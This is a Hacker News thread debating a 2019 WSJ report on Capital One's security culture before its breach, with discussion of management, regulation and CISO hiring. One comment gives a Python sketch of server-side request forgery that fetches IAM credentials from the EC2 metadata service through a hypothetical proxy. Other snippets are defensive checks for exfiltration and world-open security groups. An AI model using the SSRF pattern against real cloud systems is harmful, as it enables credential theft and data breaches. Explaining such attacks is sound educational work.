Capital One Cyber Staff Raised Concerns Before Hack (wsj.com)
141 points by valiant-comma on Aug 16, 2019 | 66 comments



Not discounting this story, but I'd like to point out that raising concerns is a personal protective strategy for any cyber staff. If you constantly raise concerns that you know cannot or will not be resolved, you have created a paper-trail scapegoat for when something goes wrong. The more ambiguous the better: firewall settings aren't monitored closely enough, too much turnover means something will fall through the cracks, etc.

Protecting a large enterprise from cyber attacks is basically impossible, so coping with that stress and protecting your career by looking for other things to blame makes sense to me.


That is an unfair blow. What can you do as an individual in an organization that does not value security and sees it as a sunk cost? I found myself in that position multiple times, and I am a sysadmin, not a security guy. I have no formal responsibility in that position and no incentive to cover my ass. But I still have fights with management about it.


IMHE Cap One took security very seriously, although security expertise was not widely diffused.

Frankly I’m surprised their policy enforcement measures didn’t catch the misconfigured app.


you don't, except to cover your ass. And so the problem remains unsolved. The law, and regulation, needs to step in.

It should be as frowned upon by the law as a restaurant not meeting sanitation requirements.


> you don't, except to cover your ass.

You might want to read my reply once more.

> And so the problem remains unsolved.

Why do you talk about things you don't know? I've scored multiple victories on that front.

> The law, and regulation, needs to step in.

I work in PCI environments. The regulations are there but few companies follow them except on paper to cover their ass. Regulations are not the solution. People are. We need to fight.


PCI regulations are weak and do little to cover the majority of threats.


> Protecting a large enterprise from cyber attacks is basically impossible

But protecting it from easily preventable cyber attacks "of opportunity" is perfectly possible if you have capable management. They are responsible for building a team of good engineers, trusting them when they raise concerns, and acting on those concerns. Of course, for mediocre management teams who are unable to do any of the above, this is always a CYA exercise. When you're the person with the budget and the decision power, you need to come up with solutions, not excuses. This is not a "falling through the cracks" situation. This is a "let's put up a tarp instead of a door and hope nobody notices" situation.

Ensuring the physical security of a large enterprise 100% of the time is basically impossible, but if someone just walks right past your security staff in the middle of the day and walks out with a rack from the DC, then you have a management problem.


I am becoming certain that every company will get penetrated at some point, e.g. through a poorly configured WordPress box. What happens next is what matters: least privilege, preventing east-west movement, log aggregation with anomaly detection, noticing data exfil, etc. Defense in depth is what matters.
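
To make the "noticing data exfil" part concrete, here's a toy sketch of the idea (not any particular product; the record format and 10x-median threshold are illustrative assumptions): aggregate outbound bytes per host from flow logs and flag hosts that dwarf the typical volume.

    # Toy exfiltration check over aggregated flow records.
    # Record format and the 10x-median threshold are illustrative assumptions.
    from statistics import median

    def flag_exfil(flow_records, multiple=10.0):
        totals = {}
        for rec in flow_records:
            totals[rec["src"]] = totals.get(rec["src"], 0) + rec["bytes_out"]
        baseline = median(totals.values())
        return [host for host, vol in totals.items() if vol > multiple * baseline]

    records = [
        {"src": "10.0.1.5", "bytes_out": 10_000},
        {"src": "10.0.1.6", "bytes_out": 12_000},
        {"src": "10.0.1.7", "bytes_out": 9_000},
        {"src": "10.0.1.8", "bytes_out": 40_000_000},  # bulk download leaving the VPC
    ]
    print(flag_exfil(records))  # ['10.0.1.8']

Real anomaly detection would baseline each host over time, but the point stands: exfiltration at that scale is loud if anyone aggregates the logs and looks.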


I’m discounting the story. Some of the complaints are ridiculous. ‘Too many different languages’?


For an appsec team to have a chance in hell they need to be able to understand the application code, no?

This seems like a reasonable complaint given that it’s a problem for polyglot dev teams.


> For an appsec team to have a chance in hell they need to be able to understand the application code, no?

No, especially for networked services.

There is a lot of homework that has to happen for security teams to even begin to look into the actual source code.

What you need to learn is how the application interacts with the outside world and how to secure those mechanisms. It can be a black box – and for the most part it should be, otherwise you'll be bogged down in minutiae while there are big holes waiting to be plugged.

What you may need to understand in more depth are the protocols in use and the access controls. But again, the programming language or the exact code matters little. Even if you have to do stuff like correctness proofs, congratulations! You are now part of the development team. Now you need to add security folks to look into the big picture again.
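
In that spirit, the black-box homework can start with nothing more than enumerating what the service actually exposes. A minimal sketch (the hostname is a placeholder; only probe systems you're authorized to test):

    # Black-box surface check: which ports answer, and what do they say?
    # No knowledge of the implementation language is needed.
    import socket

    def probe(host, ports, timeout=2.0):
        findings = {}
        for port in ports:
            try:
                with socket.create_connection((host, port), timeout=timeout) as sock:
                    sock.settimeout(timeout)
                    try:
                        findings[port] = sock.recv(128).decode(errors="replace").strip()
                    except socket.timeout:
                        findings[port] = "(open, no banner)"  # e.g. HTTP waits for a request
            except OSError:
                pass  # closed or filtered
        return findings

    # "app.internal.example" is hypothetical, not a real assessment target.
    print(probe("app.internal.example", [22, 80, 443, 8080]))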


Technically, addressing flaws that deep can be valid. But this was major low-hanging fruit: the missing protection on their cloud servers is what made this breach possible, and that is a configuration issue, not a language issue, on the technical end. On the management end, it is an issue of utter technical incompetence.


diversity of code base is a strength, except to vendors and pointy-haired ones


Let me help. In the first paragraph it says

> and a failure to promptly install some software to help spot and defend against hacks

so against your "cannot or will not be resolved" you have actual software actually not being installed (and that's on top of the other bad smells at the company listed in the article).

> Protecting a large enterprise from cyber attacks is basically impossible

Absolute garbage. You seem to be confused about 'protecting against' vs 'making invulnerable'. And your profile actually claims you have a "Fintech CTO background [...] including risk analysis" - honestly, what on earth made you post such a thing?


To be fair, this could go either way.

Some cyber sec professionals are all about the products, but often it's just a barrage of random crap that doesn't really do anything, with no strategic planning, deployed in an attempt to paper over the fact that they have no skills in the area they're buying for.

Sometimes it's easier to just install it, but engineering budget _is_ a zero-sum game, so wasting time adding random binaries, which sometimes actually increase risk, is something you can see being ignored.

Further, the specific attack didn't require any monitoring tools beyond the ones already claimed to have been configured. They just weren't being used properly.

P.S. Given there was high churn in InfoSec staff, I could totally imagine them all asking for their pet products and then raising concerns when they don't get them. This is typical in dysfunctional orgs.


This article is devoid of any meaningful analysis and perspective.

>The cybersecurity unit—responsible for ensuring Capital One’s firewalls were properly configured and scanning the internet for evidence of a data breach—has cycled through senior leaders and staffers in recent years, according to the people.

Firewall team combined with threat-intel? I'm not sure what that has to do with the breach, or preventing it.

>Sometimes the broader tech-centric culture of the firm could complicate security, the people said. Technology employees had at times been given free rein to write in many coding languages—so many that it made it harder for the cybersecurity unit to spot problems, according to people familiar with the matter.

Super common, but the number of coding languages isn't plausibly responsible for the hack. If there had been a code-level vulnerability that would most likely have been caught by static analysis, but wasn't because their scanning tools didn't support a language, this comment would make more sense.

>the alleged hacker found that a computer managing communications between the company’s cloud and the public internet was misconfigured—effectively it had weak security settings, the Journal previously reported.

Server-Side Request Forgery, coupled with over-permissioning, could be explained this way - a misconfigured WAF. A poor description of what we think may be the actual exploit (sketch of the pattern below).

It goes on and on.
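
For readers unfamiliar with the pattern: public write-ups describe SSRF against the EC2 instance metadata service, which hands out temporary credentials for the instance's IAM role. A minimal sketch of that general pattern; the proxy endpoint and its "url" parameter are hypothetical, not the actual Capital One details:

    # SSRF-to-metadata sketch: a server-side component that fetches
    # attacker-supplied URLs is pointed at the EC2 metadata service.
    # The vulnerable endpoint and "url" parameter are hypothetical.
    import requests

    PROXY = "https://victim.example/fetch"  # hypothetical SSRF-able endpoint
    META = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

    # 1. The metadata index returns the name of the instance's IAM role.
    role = requests.get(PROXY, params={"url": META}).text.strip()

    # 2. Appending the role name returns temporary credentials. If the role
    #    is over-permissioned (say, s3:Get*/List* on everything), those keys
    #    read the buckets directly, no further "hacking" required.
    creds = requests.get(PROXY, params={"url": META + role}).json()
    print(creds["AccessKeyId"])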


In the olden days, you could sum up the entire information security knowledge and posture of many companies with "we're behind a firewall, so everything is fine".

Some companies have not evolved much beyond this attitude, and it shows with ridiculous wording like this.


In the real olden days (mid 90's), we had entire offices with public IP addresses and no firewalls!


I have experience with these types of environments.

When you allow people to code in different languages and different environments, everyone has different needs.

They need different software, which often connects to different network resources. You get endless incidents where users can't program because they can't download a plugin, or because their software needs libraries found on the internet. If the network group is being lazy, they can end up opening up more to the internet than they should, because it's too much work to accommodate everyone when there are no standards.

Network openings like the ones these scenarios create are enough to infiltrate a company if someone does something as innocuous as clicking a random link on Google with a vulnerable browser.
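
One cheap guardrail against that failure mode is periodically auditing for world-open rules. A minimal boto3 sketch (assumes AWS credentials are configured; purely illustrative):

    # Flag AWS security groups that allow inbound traffic from anywhere.
    # Assumes boto3 is installed and credentials are configured.
    import boto3

    ec2 = boto3.client("ec2")
    for group in ec2.describe_security_groups()["SecurityGroups"]:
        for perm in group["IpPermissions"]:
            for ip_range in perm.get("IpRanges", []):
                if ip_range.get("CidrIp") == "0.0.0.0/0":
                    print(f"{group['GroupId']} ({group['GroupName']}): "
                          f"port {perm.get('FromPort', 'all')} open to the world")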


Upon re-read, I don't mentally equate WAF (which is related to the breach) with firewalls. In my mind, they are two completely different controls. However, I'm not sure if that's a pervasive perspective or just my own. Therefore, my aforementioned statement about firewalls may or may not be valid. YMMV.


? WAF stands for web application firewall... You don't equate a WAF with a hardware firewall? Just not understanding...


The reporter said firewall. When I read that, I don't think of a WAF, but rather a more traditional firewall that separates internet from intranet. If others, including the reporter, generally think of WAFs when they read "firewall", then my criticism on this particular point is unfair.

For example, if someone listed 2 years of experience with firewall rules, I'd automatically think routing, not WAF rule configuration.
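
The distinction in a sketch: a traditional firewall decides on layer 3/4 facts (addresses and ports), while a WAF inspects layer 7 content (the HTTP request itself). Illustrative Python, not any vendor's rule syntax:

    # A network firewall sees only addresses and ports...
    def network_firewall_allows(src_ip: str, dst_port: int) -> bool:
        return dst_port in {80, 443}

    # ...while a WAF sees the HTTP request and can, for example, block
    # parameters that point at the EC2 metadata service (an SSRF tell).
    def waf_allows(params: dict) -> bool:
        return not any("169.254.169.254" in str(v) for v in params.values())

    print(network_firewall_allows("203.0.113.7", 443))             # True
    print(waf_allows({"url": "http://169.254.169.254/latest"}))    # False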


Management just does basic risk assessment: paying a few million here or there in fines doesn't really impact business continuity, so security is not important at all. That's the reality.

For-profit companies are often quite unethical. Laws that put executives in jail if they do not perform basic due diligence might help, e.g. requiring proof that a security program is established and executed on, and that their own defined standards and policies are met. There are quite a few CSOs/CISOs from breached companies who should not be allowed to continue practicing their profession.

Startups often fall squarely into this bucket, unfortunately. As soon as one has more than a certain number of customers, the stakes should become extremely high.


> For-profit companies are often quite unethical.

this is why I'm an advocate of making the law === ethics. The reason a company is unethical is that ethical companies are punished by the market (an unethical but completely law-abiding company can outcompete them by virtue of having lower costs).


This is difficult because not everyone believes in the same ethics or follows the same laws. I think it's best to not assume my ethics are somehow more or less valid than anyone else's.

That said, I definitely agree that the law needs to change for these situations. It's tricky though, because the entire reason people create corporations is to avoid personal responsibility for their actions.


There is a great new book describing ethical and moral stances, and how one goes from moral absolutism to decency: "A Decent Life" by Todd May.

Also, corporations allow you to avoid personal financial liability, but not personal responsibility... society and community still hold people accountable for social violations. People are also still accountable for criminal activity.


>I think it's best to not assume my ethics are somehow more or less valid than anyone else's.

That violates the law of non-contradiction. Either one is wrong and one is right, or both people are wrong and haven't realized what is right yet. Moral subjectivism as a principle makes absolutely no sense, and Aristotle destroyed that argument in the Nicomachean Ethics.


I simply meant that when I am initially appalled by someone else's behavior it is usually more useful to try to understand their point of view than it is to demonize them. I also try to remind myself that I always have room for improvement. Of course there are plenty of times where I can't excuse or even understand the bad actions of others. I'm just wary of anyone treating their personal morals as absolute.


Are you trolling? I can't tell.


No. People just have no concept of objective morality today because everyone is hyper-sensitive to everything and can't take criticism at all.


what does it even mean for a moral system to be "right" or "wrong"? it's not like they have any predictive power.


I think the problem with this is that there will always be "unethical" ways to work around the legal system. In fact, having more laws can make this easier and more obscure.


This would be incredible, but generally deregulation is eschewed by the elite. Speed limits for instance serve no purpose in nearly every case except to raise revenue.


speed limits serve a very important purpose: set them so that most people will speed, and now you can pull any of them over at any time.


exactly what the parent comment was getting at. the main reason to pull someone over for speeding is to issue a ticket to generate revenue.


most often, yes, it is just to raise revenue. but it also creates an opportunity to sidestep some of the protections that a driver should enjoy. technically, a police officer cannot pull you over without cause, but unreasonable traffic laws essentially create a cause to pull anyone over.

I don't disagree with GP, just pointing out that it's a bit more sinister than just writing tickets. many situations where police abuse their power and/or use excessive force begin with a legal traffic stop.


The legal profession has the bar and licensing: you are required to be licensed to practice law.

Why can't we have something similar for such professions?


Because that's fundamentally not the problem. At every company I've worked at, the senior engineers could tell you exactly how they were skimping on security, why it's bad, and how to fix it.

The problem isn't lack of knowledge or skill, it is that management refuses to commit the resources necessary to build secure products. When the difference between building secure X and not-secure X is often 2-3 times the effort and time commitment, managers will almost always pick not-secure X and roll the dice on nothing going wrong.

From their point of view, adding security does nothing for the product. The customers are paying for the value-prop and marginal improvements on it, not the integrity of the backend.

If you want to solve the problem of lax security, you need to make security breaches a business-ending proposition. You also need to increase the likelihood of being compromised so that people aren't tempted to roll the dice. If you want regulation, I would support some kind of white-hat law that says if you compromise sensitive company data, the corporation has to (1) pay an Amazon-bankrupting amount of money and (2) give 20% of it to the team that broke them.


> pay an Amazon-bankrupting amount of money

I'd love to see this even though I know it won't happen but I want to go through a mental exercise:

(Off-topic, but) where does this money go? I think about things like traffic tickets or any other fee or fine, and I can't think of any destination that's any good. If it goes to anything that taxes would otherwise pay for, it will create pressure to decrease taxes and make our governments dependent on this income.

Is there any good answer to this? Prison for the CEO and the board seems much easier in comparison.


I can see that if the intent was malicious (like executives deciding it was totally fine to rely on insurance to pay out in case of a breach, versus hiring a security team).

But if it is the more normal circumstance (a vulnerability in one of the 30 libraries you use led to the breach), there should absolutely be a monetary punishment, but jail time seems too much.


Hiring great people and getting out of their way is only one of three table legs. The other two are listening when they advise you, and empowering them to effect change.


Even if you know that your company is doing nothing to find exposed secrets on the web, can a single engineer just tell their manager, "Hey, you know what? I'm not going to work on the task you assigned me; I'm going to work on this other thing which might be beneficial down the road"?

Somebody has to groom the "concern" into a story that can be worked on, then assign it to someone. But often this kind of work will get passed over by a manager or team that would rather work on something else, or doesn't see it as important. If you have high turnover, that makes addressing "concerns" all the more difficult, as people aren't around long enough to coordinate working on them.

So just "raising concerns" is not going to change anything; somebody at the top has to be listening for them, and somebody in the middle needs to be tracking getting them resolved.


To this day I still receive emails for another person with my name through Capital One 360. Some were regarding overdue bills, and in others personal information was given. I called repeatedly... and nothing was ever done about it. I think they poorly merged account data at one point; perhaps it's a broader reflection of their IT work.


"9 people 6 months to do"

That sounds to me like they had decided that they, for whatever reason, didn't want to do the work.


How about introducing the following law: if an employee is aware of a breach in their company's systems and uses said breach to enrich themselves, they are protected by law against all prosecution related to said malicious action.


We made an interactive demo to show how the hacker exploited the vulnerability https://application.security


well, looks like they caught him. /s

What a one-sided hit piece.


https://www.linkedin.com/in/michael-johnson-098437117/

They hired a bureaucrat, not an engineer, to be their CISO.


Hiring an engineer (and by that I assume you mean someone who has the bulk of their experience as a software engineer) as CISO is exactly the opposite of what a company should do. Security is absolutely not the same skill set as software engineering, and it's a huge misconception that people equate infosec with programming. Security engineers of course should be programmers, but an enormous amount of work that goes into infosec has absolutely nothing to do with code, and this is especially true for someone high up in management ranks like a CISO where their entire job is dealing with bureaucracy.

Hiring an engineer to be a CISO would be like choosing a biologist to give you surgery instead of a surgeon. Yes, a biologist probably knows a lot about the nitty-gritty of how bodies work, but knowing how the body works and knowing how to perform surgery on a body are two very, very different things.

That guy's LinkedIn looks more than qualified to be a CISO, and is certainly more qualified than the vast majority of CISOs I worked with in my career as a security consultant. And on top of all that, he has a degree in computer engineering and has prior experience as an engineer, so I have no idea why you're claiming he isn't an engineer.


It's difficult because the CISO runs the budget, and a non-technical CISO, in my experience, is much more likely to buy products and not hire people needed to use them.

Think about it this way: publications are telling you that ~92% of cyber attacks start from an end user's device. Probably true, but are we talking about a device being owned here, or are we discussing actual PII data loss?

More importantly, whilst Gartner and co. are telling you what products you need to buy to defend against this, what they aren't telling you is that the best product only has a 52% attack detection rate. And that only accounts for known attack vectors.

So you're a CISO: 15 million down on products, 5 million down on risk people, without a software developer, sysadmin, or release engineer on your team. The actual engineering team ignores you because you keep raising stupid concerns.

Would this have happened if you were technical? Maybe, but you'd have a different set of problems.


I see where you’re coming from but this is not far off the thinking that “an MBA can manage anything”.

To use your analogy: no surgeon is allowed to cut until he or she has a solid grounding in biology.


You're right, that wasn't a very good analogy. My point is not to say that a CISO/surgeon shouldn't have any experience in engineering/biology (in fact, as you pointed out, it is the opposite! you ideally want a CISO with some technical chops just as you want a surgeon with some biology knowledge). My point is that there is much more to being a CISO than just technical knowledge.

Maybe a better analogy would be choosing someone to represent you in a lawsuit about programming patents. You would want a lawyer representing you, not a programmer. Ideally the lawyer would have some previous experience with these kinds of cases and would lean on programming experts for their knowledge. Maybe they are even a former programmer turned lawyer! But I certainly wouldn't hire "a programmer" to represent me no matter how experienced in programming they are. Linus Torvalds would be a great expert witness, but he isn't going to be my general counsel.


I would say the lawsuit example isn't great; lawyer is a specialized profession unto itself. Management has its own vagaries, but I think it's easier for the right kind of engineer to get into management than for a lifelong manager to gain competence in engineering, and that was the original point. Having someone with no background in engineering running a department is suspect.


There's still a disconnect here. Infosec is a specialized profession unto itself, too. A CISO is not just "an engineer that's gone into management". My original point is that security is so far removed from "engineering" that it's incorrect to equate the two (even though it's done all the time).

>I think it's easier for the right kind of engineer to get into management rather than a lifelong manager to gain competence in engineering

IME, it's the opposite. It depends on your specific goal (are we trying to train someone to be CISO or are we training them to be a SOC team leader?), but it's ridiculously easier (and more effective) to take a person with existing management abilities and teach them about security than it is to take an engineer and teach them security management skills.

>Having someone with no background in engineering running a department is suspect.

It's really not, because again, engineering != security. It's no more suspect than the CFO not having a background in engineering.


> To use your analogy: no surgeon is allowed to cut until he or she has a solid grounding in biology.

I take it you're unfamiliar with the content of the MCAT exam, which is a prerequisite to admission to American medical schools.


Sounds like they hired a CISO with a toxic personality more interested in internal PR than security, and all the talent ran off. Sounds like this is the exact opposite of what any company should do.


not sure a biologist knows more about the body than a surgeon. isn't it more like asking a surgeon to run the department?


This is an extreme manipulation of the facts. He has an M.Sc in Computer Science, did R&D at Hewlett-Packard during their golden age, and then spent 22 years at Sandia.

This guy was only a bureaucrat in the thinnest interpretation of the word.


He worked at Sandia so he seems to have engineering chops. But it is ridiculous to think that one individual or even one isolated group can defend against pervasive threats. Like worker safety, it has to be a cultural priority starting at the top and made priority #1 in every decision and work process.

Even then, security is an illusion. Eventually something or someone will find a way to get through. Zero trust needs to be embraced. Assume every employee, partner, developer and vendor is going to have full internal access and abuse it...then defend from there.


What, according to you, qualifies someone to be the CISO of a bank or a financial institution?

I would any day put my money in a bank whose CISO has credentials like Michael Johnson's. He has been an engineer, done R&D, and I'd guess he has the right chops too. And cyber security has multiple layers, the weakest of which is usually the people. And that, my friend, cannot really be solved just by tech.


Whatever he was, if the article is to be believed, it seems like his poor management caused the problem. I believe it. This is often the case: managers actively interfere with the priorities that the engineers try to set. Not only that, but he was using resources to play politics.

The issue is that fundamentally that's what managers and executives do. Their profession is politicking and manipulation rather than solving problems.



Sounds like they hired an Olympian


I think someone is trying to cover their ass. Think about how this story could have been written: the WSJ reaches out to current and former employees and writes what they say. Those cybersecurity employees are already feeling the heat and want to preserve their reputations, so they throw someone else under the bus.

This was an inside hack by a former AWS employee. It was difficult to protect against. I can't fault Capital One here as much as I can fault AWS.

There will always be tension between the Security team and the rest of the company.


> former AWS employee

I've yet to see anything that would imply that being an ex-employee helped. It seems she used a "public" attack vector.


She was an AWS insider, aware of the configurations environments commonly should have in place, and aware that Capital One had a few places to poke here and there.

I hardly call this a hack. It's more of a cake recipe she followed, thanks to working directly on AWS and being a crook.



